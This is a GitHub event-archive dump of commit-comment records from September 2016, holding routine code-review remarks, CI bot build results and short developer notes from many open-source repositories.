{"id":"4539649269","type":"CommitCommentEvent","actor":{"login":"itsamti"},"repo":{"name":"beckyricha/Broadlink-RM-SmartThings-Alexa"},"payload":{"comment":{"id":18961382,"position":null,"line":null,"path":null,"commit_id":"62f4e2eb22d7031b27f01fa42dbf53e8549234f7","created_at":"2016-09-09T11:56:22Z","updated_at":"2016-09-09T11:56:22Z","body":"This code is working for me. I tested it with second \"sendHubCommand\" had 'toggle' hardcoded to 'off' and increased delay to 15000 ms. I could see that if I press ON button, Lamp will turn on and turns off after 15 seconds. Please see log below\r\n\r\n7:48:31 AM: debug Running REST API Command http://192.168.1.154:7474/code/S3SW2%20off\r\n7:48:31 AM: debug dEnd = 1473421711567\r\n7:48:31 AM: debug Slept 15001ms\r\n7:48:16 AM: debug dStart = 1473421696566\r\n7:48:16 AM: debug start sleeping\r\n7:48:16 AM: debug Running REST API Command http://192.168.1.154:7474/code/S3SW2%20off\r\n7:48:16 AM: debug PUBLISHED off()\r\n\r\n\r\nI have added new commands onphysical  and offphysical as I changed switch layout. Its not just toggle but you will also see ON and OFF button on right.\r\n\r\nLot of code is commented out as I had been trying different options to make delay work. I will have to cleanup.\r\n\r\nversion is just for sending debug log what button pressed.\r\n\r\nI will update code as soon as I get sometime.\r\n\r\n"}},"created_at":"2016-09-09T11:56:22Z"}
{"id":"4539649773","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":18961385,"position":null,"line":null,"path":null,"commit_id":"2392aa9aa54d94d084bd67f07653e46058d73f97","created_at":"2016-09-09T11:56:31Z","updated_at":"2016-09-09T11:56:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;fSEIWIKp&#x2F;307-propager-aux-instances-le-contenu-de-la-variable-debug\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Propager aux instances le contenu de la variable DEBUG</a>"}},"created_at":"2016-09-09T11:56:31Z"}
{"id":"4539650416","type":"CommitCommentEvent","actor":{"login":"gut"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":18961386,"position":390,"line":1651,"path":"hphp/runtime/vm/jit/vasm-ppc64.cpp","commit_id":"9e5c244133107f211ee3679c0a1d879cdff51504","created_at":"2016-09-09T11:56:41Z","updated_at":"2016-09-09T11:56:41Z","body":"please use `not_reached();` instead of ` always_assert(false); return both;`"}},"created_at":"2016-09-09T11:56:41Z"}
{"id":"4539651188","type":"CommitCommentEvent","actor":{"login":"Nomon"},"repo":{"name":"labstack/echo"},"payload":{"comment":{"id":18961387,"position":null,"line":null,"path":null,"commit_id":"2d772e02cafe06456a1cb5f887248fc79ce9e5f1","created_at":"2016-09-09T11:56:51Z","updated_at":"2016-09-09T11:56:51Z","body":"Because it causes the stack to blow up from infinite recursion.\r\n \r\nSay I add the context with logging to echoContext ec with:\r\n```\r\nec.SetContext(logging.NewContext(ec, logger))\r\n/* newContext is now:\r\n Context{\r\n    value: logger,\r\n    parent: echoContext,\r\n }\r\n*/\r\n```\r\nSo this sets echoContext.context to a context that has .parent as the echoContext, if I then try to get a value out of the newContext with newContext.Value() and the value is not found in the first topmost context (the one with the logger), the Value will invoke Value method on the echoContext (that is the parent of the topmost context) that will again invoke Value on the .context in echoContext and so on.\r\n\r\nbecause the Value method in echoContext invokes echoContext.context.Value that is a new"}},"created_at":"2016-09-09T11:56:51Z"}
{"id":"4539653389","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18961392,"position":null,"line":null,"path":null,"commit_id":"39d09150e0ca9f708f4438312baf98d618d67ac6","created_at":"2016-09-09T11:57:24Z","updated_at":"2016-09-09T11:57:24Z","body":"I suspect that the fix merely masks a problem. In the case where the region map is a managed dataspace, the faulter is not the `Rm_client` of the region map."}},"created_at":"2016-09-09T11:57:24Z"}
{"id":"4539657418","type":"CommitCommentEvent","actor":{"login":"martijn-van-der-kooij"},"repo":{"name":"swiftyguys/lib-swifty-plugin"},"payload":{"comment":{"id":18961399,"position":null,"line":null,"path":null,"commit_id":"d82561993359cda34a51ce6d7b2beab7c22d31ed","created_at":"2016-09-09T11:58:25Z","updated_at":"2016-09-09T11:58:25Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;WJqxMBpC&#x2F;2168-make-sure-license-check-is-performed-after-9-days-make-it-less-depending-on-the-plugin-update-check\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Make sure license check is performed after 9 days, make it less depending on the plugin update check</a>"}},"created_at":"2016-09-09T11:58:25Z"}
{"id":"4539660806","type":"CommitCommentEvent","actor":{"login":"gut"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":18961405,"position":369,"line":1630,"path":"hphp/runtime/vm/jit/vasm-ppc64.cpp","commit_id":"9e5c244133107f211ee3679c0a1d879cdff51504","created_at":"2016-09-09T11:59:19Z","updated_at":"2016-09-09T11:59:19Z","body":"I believe the default clause can be omitted as, if a CC is added, this file will not compile (a compiler flag throws an error if no default clause exists and not all enum values are tested)"}},"created_at":"2016-09-09T11:59:19Z"}
{"id":"4539666665","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18961423,"position":null,"line":null,"path":null,"commit_id":"39d09150e0ca9f708f4438312baf98d618d67ac6","created_at":"2016-09-09T12:00:46Z","updated_at":"2016-09-09T12:00:46Z","body":"It's actually for this specific case you mention. You have a managed dataspace, a thread faults inside the managed dataspace and the fault get's never resolved. The region gets destructed before the thread. And when now the thread faults it has a dangling pointer to the destructed region map."}},"created_at":"2016-09-09T12:00:46Z"}
{"id":"4539671241","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18961440,"position":null,"line":null,"path":null,"commit_id":"39d09150e0ca9f708f4438312baf98d618d67ac6","created_at":"2016-09-09T12:01:54Z","updated_at":"2016-09-09T12:01:54Z","body":"Rm_faulter::_faulting_region_map is dangling in this case"}},"created_at":"2016-09-09T12:01:54Z"}
{"id":"4539673557","type":"CommitCommentEvent","actor":{"login":"JordiPolo"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18961451,"position":null,"line":null,"path":null,"commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T12:02:25Z","updated_at":"2016-09-09T12:02:25Z","body":"Thanks for the quick reply.\r\nI agree. I would hate to see `Kernel` becoming a module where a big mismatch of functions share namespace with no apparent logic behind"}},"created_at":"2016-09-09T12:02:25Z"}
{"id":"4539673803","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18961455,"position":null,"line":null,"path":null,"commit_id":"5eb9d4229f67d17596e3ae30d2500ae37d3903ad","created_at":"2016-09-09T12:02:29Z","updated_at":"2016-09-09T12:02:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 53](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13036&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-09T12:02:29Z"}
{"id":"4539674172","type":"CommitCommentEvent","actor":{"login":"gut"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":18961457,"position":696,"line":1957,"path":"hphp/runtime/vm/jit/vasm-ppc64.cpp","commit_id":"9e5c244133107f211ee3679c0a1d879cdff51504","created_at":"2016-09-09T12:02:34Z","updated_at":"2016-09-09T12:02:34Z","body":"shouldn't you break the line here?\r\n```\r\ncase Vinstr::xorqi:\r\n    defCond(v, inst, blockSigns);\r\n    break;\r\n```"}},"created_at":"2016-09-09T12:02:34Z"}
{"id":"4539676559","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18961467,"position":null,"line":null,"path":null,"commit_id":"39d09150e0ca9f708f4438312baf98d618d67ac6","created_at":"2016-09-09T12:03:12Z","updated_at":"2016-09-09T12:03:12Z","body":"> And when now the thread faults it has a dangling pointer to the destructed region map.\r\n\r\nI meant: And when now the thread _gets_ _destructed_ it uses a dangling pointer."}},"created_at":"2016-09-09T12:03:12Z"}
{"id":"4539677408","type":"CommitCommentEvent","actor":{"login":"laurynas-biveinis"},"repo":{"name":"percona/percona-server"},"payload":{"comment":{"id":18961469,"position":35,"line":301,"path":"storage/innobase/row/row0mysql.cc","commit_id":"fd63f14a05d5ce0e21526cef4c46df0096e97ea0","created_at":"2016-09-09T12:03:26Z","updated_at":"2016-09-09T12:03:26Z","body":"'len-len') must be ignored."}},"created_at":"2016-09-09T12:03:26Z"}
{"id":"4539677413","type":"CommitCommentEvent","actor":{"login":"gwaldron"},"repo":{"name":"gwaldron/osgearth"},"payload":{"comment":{"id":18961470,"position":null,"line":null,"path":null,"commit_id":"10b42b791ebc541b547e3a07c0c58cd0f373a2c7","created_at":"2016-09-09T12:03:26Z","updated_at":"2016-09-09T12:03:26Z","body":"This was unintentionally merged - now reverted until the original submitter can provide a new PR with the proper platform tests."}},"created_at":"2016-09-09T12:03:26Z"}
{"id":"4539677506","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18961471,"position":null,"line":null,"path":null,"commit_id":"f0abd864ae4464c10e7bd6a6f712acec25744a55","created_at":"2016-09-09T12:03:27Z","updated_at":"2016-09-09T12:03:27Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-09T12:03:27Z"}
{"id":"4539677639","type":"CommitCommentEvent","actor":{"login":"esby"},"repo":{"name":"esby/RawTherapee"},"payload":{"comment":{"id":18961472,"position":null,"line":null,"path":null,"commit_id":"57c4f957df51941ba895770d9912edc0e141cfce","created_at":"2016-09-09T12:03:29Z","updated_at":"2016-09-09T12:03:29Z","body":"That's still no good, because i need to process one file containing parameter for differents tools...\r\nSo the line by line will be needed at some point...\r\n\r\n\r\nthe file format for now looks like that:\r\n\r\ncat ~/myfile.ttp \r\nttsaver:favorite:crop resize whitebalance \r\nttsaver:original:vibrance(colorPanel:0) chmixer(colorPanel:1) blackwhite(colorPanel:2) hsvequalizer(colorPanel:3) filmsimulation(colorPanel:4) rgbcurves(colorPanel:5) colortoning(colorPanel:6) whitebalance(colorPanel:8) impulsedenoise(detailsPanel:3) tonecurve(exposurePanel:0) epd(exposurePanel:2) icm(colorPanel:7) sharpening(detailsPanel:0) sharpenedge(detailsPanel:1) sharpenmicro(detailsPanel:2) dirpyrdenoise(detailsPanel:4) defringe(detailsPanel:5) dirpyrequalizer(detailsPanel:6) shadowshighlights(exposurePanel:1) pcvignette(exposurePanel:3) gradient(exposurePanel:4) labcurves(exposurePanel:5) colorappearance(exposurePanel:6) rotate(lensgeom:0) perspective(lensgeom:1) lensprof(lensgeom:2) distortion(lensgeom:3) cacorrection(lensgeom:4) vignetting(lensgeom:5) sensorbayer(rawPanel:0) sensorxtrans(rawPanel:1) rawexposure(rawPanel:2) preprocess(rawPanel:3) darkframe(rawPanel:4) flatfield(rawPanel:5) prsharpening(resize:0) bayerprocess(sensorbayer:0) bayerrawexposure(sensorbayer:1) bayerpreprocess(sensorbayer:2) rawcacorrection(sensorbayer:3) xtransprocess(sensorxtrans:0) xtransrawexposure(sensorxtrans:1) crop(transformPanel:0) resize(transformPanel:1) lensgeom(transformPanel:2) ttsaver(usefulPanel:0) ttfavoritecolorer(usefulPanel:1) ttpanelcolorer(usefulPanel:2) ttudlrhider(usefulPanel:3) wavelet(waveletPanel:0) \r\nttsaver:trash:\r\nttothertool:otherparameters(...)\r\nttothertool:otherparameters(...)\r\nttothertool2:otherparameters2(...)\r\nttothertool2:otherparameters2(...)\r\n\r\nI guess I'll need to read the file, and switch to each tool when the reader encounter a change in the toolname...\r\n\r\nNB: I do that because i don't want to save parameters in pp3 files, since the tools are not related with graphical process or treatment but with the gui. \r\n\r\nTo me: pp3 are for image caculation process, ttp (or any other extension) should be for workflow. \r\nEg: you want to show some tools or some others, depending on how you wish to work.\r\n"}},"created_at":"2016-09-09T12:03:29Z"}
{"id":"4539680062","type":"CommitCommentEvent","actor":{"login":"laurynas-biveinis"},"repo":{"name":"percona/percona-server"},"payload":{"comment":{"id":18961480,"position":40,"line":306,"path":"storage/innobase/row/row0mysql.cc","commit_id":"fd63f14a05d5ce0e21526cef4c46df0096e97ea0","created_at":"2016-09-09T12:04:10Z","updated_at":"2016-09-09T12:04:10Z","body":"InnoDB coding style, opposite of MySQL one, requires a space before assignment"}},"created_at":"2016-09-09T12:04:10Z"}
{"id":"4539680628","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18961482,"position":null,"line":null,"path":null,"commit_id":"5eb9d4229f67d17596e3ae30d2500ae37d3903ad","created_at":"2016-09-09T12:04:19Z","updated_at":"2016-09-09T12:04:19Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 53](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13036&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:50"}},"created_at":"2016-09-09T12:04:19Z"}
{"id":"4539681550","type":"CommitCommentEvent","actor":{"login":"newls"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":18961483,"position":52,"line":353,"path":"inc/apirest.class.php","commit_id":"daacda142ed18dc2a635833765bafb6104c2a321","created_at":"2016-09-09T12:04:34Z","updated_at":"2016-09-09T12:04:34Z","body":"@orthagh, le problême, c'est que depuis ce commit ça ne marche plus.\r\nPourquoi ? les requêtes GET standard construites par Angular ne possèdent pas de Content-Type.\r\nDésolé je vote plutôt sur un fix côté back en l'occurence.\r\nY avait -il une raison spécifique pour obliger un content type ?\r\nPourrais-on rendre le Content-Type optionnel pour les requêtes GET ?"}},"created_at":"2016-09-09T12:04:34Z"}
{"id":"4539681953","type":"CommitCommentEvent","actor":{"login":"butenkor"},"repo":{"name":"commercetools/commercetools-sunrise-theme"},"payload":{"comment":{"id":18961486,"position":null,"line":null,"path":null,"commit_id":"a1f62363fceb44342b69570d630d3669806cec65","created_at":"2016-09-09T12:04:41Z","updated_at":"2016-09-09T12:04:41Z","body":"👍 "}},"created_at":"2016-09-09T12:04:41Z"}
{"id":"4539683637","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18961491,"position":null,"line":null,"path":null,"commit_id":"60ec043fa884f3ac07005b0da8ee997babc4cb48","created_at":"2016-09-09T12:05:09Z","updated_at":"2016-09-09T12:05:09Z","body":"input_processor_refactor (pshires) - Win64-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.72%25-red.svg)</a> \n"}},"created_at":"2016-09-09T12:05:09Z"}
{"id":"4539684400","type":"CommitCommentEvent","actor":{"login":"evgeny-sav"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18961494,"position":null,"line":null,"path":null,"commit_id":"2aeedb18f42b67f4b798842489817b94e38d3c73","created_at":"2016-09-09T12:05:19Z","updated_at":"2016-09-09T12:05:19Z","body":"+1"}},"created_at":"2016-09-09T12:05:19Z"}
{"id":"4539686265","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18961498,"position":null,"line":null,"path":null,"commit_id":"39d09150e0ca9f708f4438312baf98d618d67ac6","created_at":"2016-09-09T12:05:47Z","updated_at":"2016-09-09T12:05:47Z","body":"Thank you for this explanation. I may have to think it through but it looks like the `_faulting_region_map` should be a weak pointer then."}},"created_at":"2016-09-09T12:05:47Z"}
{"id":"4539693966","type":"CommitCommentEvent","actor":{"login":"necrodst"},"repo":{"name":"saenzramiro/rambox"},"payload":{"comment":{"id":18961513,"position":null,"line":null,"path":null,"commit_id":"22b014c9932533597e98e4aded1ff7d4a6820cbd","created_at":"2016-09-09T12:07:47Z","updated_at":"2016-09-09T12:07:47Z","body":"Bug : https://github.com/saenzramiro/rambox/issues/307"}},"created_at":"2016-09-09T12:07:47Z"}
{"id":"4539695016","type":"CommitCommentEvent","actor":{"login":"balakrishnanitw"},"repo":{"name":"balakrishnanitw/python"},"payload":{"comment":{"id":18961518,"position":null,"line":null,"path":null,"commit_id":"b2cbccf4155106e09ed65d69b145ef0b6ef34b45","created_at":"2016-09-09T12:08:06Z","updated_at":"2016-09-09T12:08:06Z","body":"import numpy\r\nn,m = map(int,input().split())\r\nar = []\r\nfor i in range(n):\r\n    tmp = list(map(int,input().split()))\r\n    ar.append(tmp)\r\nnp_ar = numpy.array(ar)\r\nprint(numpy.mean(np_ar,axis=1))\r\nprint(numpy.var(np_ar,axis=0))\r\nprint(numpy.std(np_ar,axis=None))\r\n"}},"created_at":"2016-09-09T12:08:06Z"}
{"id":"4539696102","type":"CommitCommentEvent","actor":{"login":"laurynas-biveinis"},"repo":{"name":"percona/percona-server"},"payload":{"comment":{"id":18961524,"position":209,"line":559,"path":"storage/innobase/row/row0mysql.cc","commit_id":"fd63f14a05d5ce0e21526cef4c46df0096e97ea0","created_at":"2016-09-09T12:08:22Z","updated_at":"2016-09-09T12:08:22Z","body":"s/ib_logf(IB_LOG_LEVEL_ERROR, ...); ut_error;/ib_logf(IB_LOG_LEVEL_FATAL, ...);/g"}},"created_at":"2016-09-09T12:08:22Z"}
{"id":"4539700846","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18961533,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-09T12:09:36Z","updated_at":"2016-09-09T12:09:36Z","body":"The old one is buggy. "}},"created_at":"2016-09-09T12:09:36Z"}
{"id":"4539701249","type":"CommitCommentEvent","actor":{"login":"sebastic"},"repo":{"name":"gwaldron/osgearth"},"payload":{"comment":{"id":18961534,"position":null,"line":null,"path":null,"commit_id":"10b42b791ebc541b547e3a07c0c58cd0f373a2c7","created_at":"2016-09-09T12:09:42Z","updated_at":"2016-09-09T12:09:42Z","body":"I'm not going to bother with that, we'll just keep carrying the patch in the distribution packages."}},"created_at":"2016-09-09T12:09:42Z"}
{"id":"4539705511","type":"CommitCommentEvent","actor":{"login":"dimadsgn"},"repo":{"name":"dimadsgn/126260-sedona"},"payload":{"comment":{"id":18961540,"position":null,"line":null,"path":null,"commit_id":"e30cf14c28326c57b7ff623287e1118292b54baf","created_at":"2016-09-09T12:10:44Z","updated_at":"2016-09-09T12:10:44Z","body":"+ кнопку открытия формы сделал  <a> ссылкой"}},"created_at":"2016-09-09T12:10:44Z"}
{"id":"4539705526","type":"CommitCommentEvent","actor":{"login":"yohanboniface"},"repo":{"name":"Leaflet/Leaflet"},"payload":{"comment":{"id":18961541,"position":32,"line":32,"path":"docs/_posts/2016-09-09-foss4g-report.md","commit_id":"a5e3f0a857da814f008a8032ccdb8aced1fd08f9","created_at":"2016-09-09T12:10:44Z","updated_at":"2016-09-09T12:10:44Z","body":"*in* subtle ways?"}},"created_at":"2016-09-09T12:10:44Z"}
{"id":"4539706083","type":"CommitCommentEvent","actor":{"login":"ddurieux"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":18961544,"position":52,"line":353,"path":"inc/apirest.class.php","commit_id":"daacda142ed18dc2a635833765bafb6104c2a321","created_at":"2016-09-09T12:10:53Z","updated_at":"2016-09-09T12:10:53Z","body":"Perhaps define a content-type per default if not defined. \r\nin RFC2616 section 7.2.1, it say we try to determine the content-type by content or extension name if content-type not defined"}},"created_at":"2016-09-09T12:10:53Z"}
{"id":"4539707902","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18961551,"position":null,"line":null,"path":null,"commit_id":"25f056ca24db7958f218337b373d61a81189367c","created_at":"2016-09-09T12:11:21Z","updated_at":"2016-09-09T12:11:21Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-09T12:11:21Z"}
{"id":"4539712073","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18961562,"position":null,"line":null,"path":null,"commit_id":"25f056ca24db7958f218337b373d61a81189367c","created_at":"2016-09-09T12:12:25Z","updated_at":"2016-09-09T12:12:25Z","body":"7 passing, 2 failing\nName of first spec to fail: Query Service Should be able to find CPSC 410 average "}},"created_at":"2016-09-09T12:12:25Z"}
{"id":"4539714698","type":"CommitCommentEvent","actor":{"login":"JacksonFaller"},"repo":{"name":"JacksonFaller/.Net"},"payload":{"comment":{"id":18961571,"position":null,"line":null,"path":null,"commit_id":"dca9f84c8e6545f4334fdc0bda75e7895135c327","created_at":"2016-09-09T12:13:04Z","updated_at":"2016-09-09T12:13:04Z","body":"http://acm.timus.ru/problem.aspx?space=1&num=1787"}},"created_at":"2016-09-09T12:13:04Z"}
{"id":"4539715682","type":"CommitCommentEvent","actor":{"login":"mhebing"},"repo":{"name":"paneldata/soep-core"},"payload":{"comment":{"id":18961573,"position":null,"line":null,"path":null,"commit_id":"a85bd3afdef9d824fdec0f90a5737573015ecf86","created_at":"2016-09-09T12:13:18Z","updated_at":"2016-09-09T12:13:18Z","body":"#5"}},"created_at":"2016-09-09T12:13:18Z"}
{"id":"4539721433","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18961583,"position":10,"line":10,"path":"tutorials/13_semestralka.md","commit_id":"114de46ee4336dacbd26d5659f9fea825d78781c","created_at":"2016-09-09T12:14:47Z","updated_at":"2016-09-09T12:14:47Z","body":"v jazyce Python verze 3.3 nebo vyšší :)"}},"created_at":"2016-09-09T12:14:47Z"}
{"id":"4539722693","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18961584,"position":null,"line":null,"path":null,"commit_id":"4d35b4442e6218f2937e9feb938ec92a7dec1e3b","created_at":"2016-09-09T12:15:08Z","updated_at":"2016-09-09T12:15:08Z","body":"@nadahar Thanks, i will delete it.\r\nI hesitated to do it...but i was afraid to don't give all informations."}},"created_at":"2016-09-09T12:15:08Z"}
{"id":"4539725589","type":"CommitCommentEvent","actor":{"login":"Hodgy"},"repo":{"name":"jedi58/inachis"},"payload":{"comment":{"id":18961589,"position":4,"line":33,"path":"src/Inachis/CoreBundle/Application.php","commit_id":"049b672f5aab2c021ca6f8dc652802d650bcf6bf","created_at":"2016-09-09T12:15:51Z","updated_at":"2016-09-09T12:15:51Z","body":"If*"}},"created_at":"2016-09-09T12:15:51Z"}
{"id":"4539728962","type":"CommitCommentEvent","actor":{"login":"fire"},"repo":{"name":"octoai/config"},"payload":{"comment":{"id":18961601,"position":18,"line":18,"path":"README.md","commit_id":"ab0172eace06b1aeb6c5597773db956f30c09651","created_at":"2016-09-09T12:16:42Z","updated_at":"2016-09-09T12:16:42Z","body":"Amd typo"}},"created_at":"2016-09-09T12:16:42Z"}
{"id":"4539731633","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18961617,"position":null,"line":null,"path":null,"commit_id":"849f8e9af375a7548f50695ef634ff49c5219293","created_at":"2016-09-09T12:17:23Z","updated_at":"2016-09-09T12:17:23Z","body":"I lost track of your recent tests. \r\nThe following could be interesting\r\nbool bothFlanks = (pos.pieces(PAWN) & FileABC) && (pos.pieces(PAWN) & FileFGH);\r\n\r\nbut it would be "}},"created_at":"2016-09-09T12:17:23Z"}
{"id":"4539735076","type":"CommitCommentEvent","actor":{"login":"simi"},"repo":{"name":"rubygems/rubygems.org"},"payload":{"comment":{"id":18961627,"position":null,"line":null,"path":null,"commit_id":"53eadf5184bad12e9e6093108fdd8b3dd7c55475","created_at":"2016-09-09T12:18:19Z","updated_at":"2016-09-09T12:18:19Z","body":"I think the reason for this was to be able restore gems back and ensure they are the same."}},"created_at":"2016-09-09T12:18:19Z"}
{"id":"4539735800","type":"CommitCommentEvent","actor":{"login":"thingdeux"},"repo":{"name":"jjtriplei/AwwPoints"},"payload":{"comment":{"id":18961628,"position":31,"line":36,"path":"models/user.py","commit_id":"6298ffd419d8207966832dfa8c1ca886bf58050b","created_at":"2016-09-09T12:18:31Z","updated_at":"2016-09-09T12:18:31Z","body":"All lowercase :)"}},"created_at":"2016-09-09T12:18:31Z"}
{"id":"4539736048","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18961630,"position":null,"line":null,"path":null,"commit_id":"eb85597347a393c6c4da07423d9828717b1b66e4","created_at":"2016-09-09T12:18:35Z","updated_at":"2016-09-09T12:18:35Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#LnCzVdF5TO2GbL3WIixKVQ"}},"created_at":"2016-09-09T12:18:35Z"}
{"id":"4539739240","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18961638,"position":10,"line":10,"path":"tutorials/13_semestralka.md","commit_id":"114de46ee4336dacbd26d5659f9fea825d78781c","created_at":"2016-09-09T12:19:23Z","updated_at":"2016-09-09T12:19:23Z","body":"Klidně to pushni do masteru.\n"}},"created_at":"2016-09-09T12:19:23Z"}
{"id":"4539739406","type":"CommitCommentEvent","actor":{"login":"hasufell"},"repo":{"name":"freeorion/freeorion"},"payload":{"comment":{"id":18961639,"position":22,"line":45,"path":"CMakeLists.txt","commit_id":"d87fd278225fb35836471eb0425b6675530d22d9","created_at":"2016-09-09T12:19:25Z","updated_at":"2016-09-09T12:19:25Z","body":"`CMAKE_INSTALL_LIBDIR` may or may not be an absolute path. In case it is, `${CMAKE_INSTALL_PREFIX}/${FreeOrion_INSTALL_LIBDIR}` will point to a non-existent path.\r\n\r\nOnly `CMAKE_INSTALL_FULL_LIBDIR` can be assumed to be an absolute path."}},"created_at":"2016-09-09T12:19:25Z"}
{"id":"4539740509","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":18961641,"position":null,"line":null,"path":null,"commit_id":"441c4cd59da34d55ebb4a7e2cfba27d1562a212a","created_at":"2016-09-09T12:19:42Z","updated_at":"2016-09-09T12:19:42Z","body":"@wheresmyjetpack some more test cases for you. This was long overdue, got some time today."}},"created_at":"2016-09-09T12:19:42Z"}
{"id":"4539741324","type":"CommitCommentEvent","actor":{"login":"hasufell"},"repo":{"name":"freeorion/freeorion"},"payload":{"comment":{"id":18961645,"position":4,"line":2,"path":"GG/cmake/GiGi.pc.in","commit_id":"d87fd278225fb35836471eb0425b6675530d22d9","created_at":"2016-09-09T12:19:54Z","updated_at":"2016-09-09T12:19:54Z","body":"same here, `CMAKE_INSTALL_LIBDIR` must not be assumed to be a relative path"}},"created_at":"2016-09-09T12:19:54Z"}
{"id":"4539741615","type":"CommitCommentEvent","actor":{"login":"hasufell"},"repo":{"name":"freeorion/freeorion"},"payload":{"comment":{"id":18961648,"position":4,"line":2,"path":"GG/cmake/GiGiSDL.pc.in","commit_id":"d87fd278225fb35836471eb0425b6675530d22d9","created_at":"2016-09-09T12:19:58Z","updated_at":"2016-09-09T12:19:58Z","body":"same here, `CMAKE_INSTALL_LIBDIR` must not be assumed to be a relative path"}},"created_at":"2016-09-09T12:19:58Z"}
{"id":"4539745310","type":"CommitCommentEvent","actor":{"login":"frantisekz"},"repo":{"name":"kejbaly2/devconfcz"},"payload":{"comment":{"id":18961658,"position":11,"line":130,"path":"docs/index.html","commit_id":"3109861ca5a517855b44599b32dba2406e2cb570","created_at":"2016-09-09T12:20:54Z","updated_at":"2016-09-09T12:20:54Z","body":"watch out for typos here (ccol + ol)"}},"created_at":"2016-09-09T12:20:54Z"}
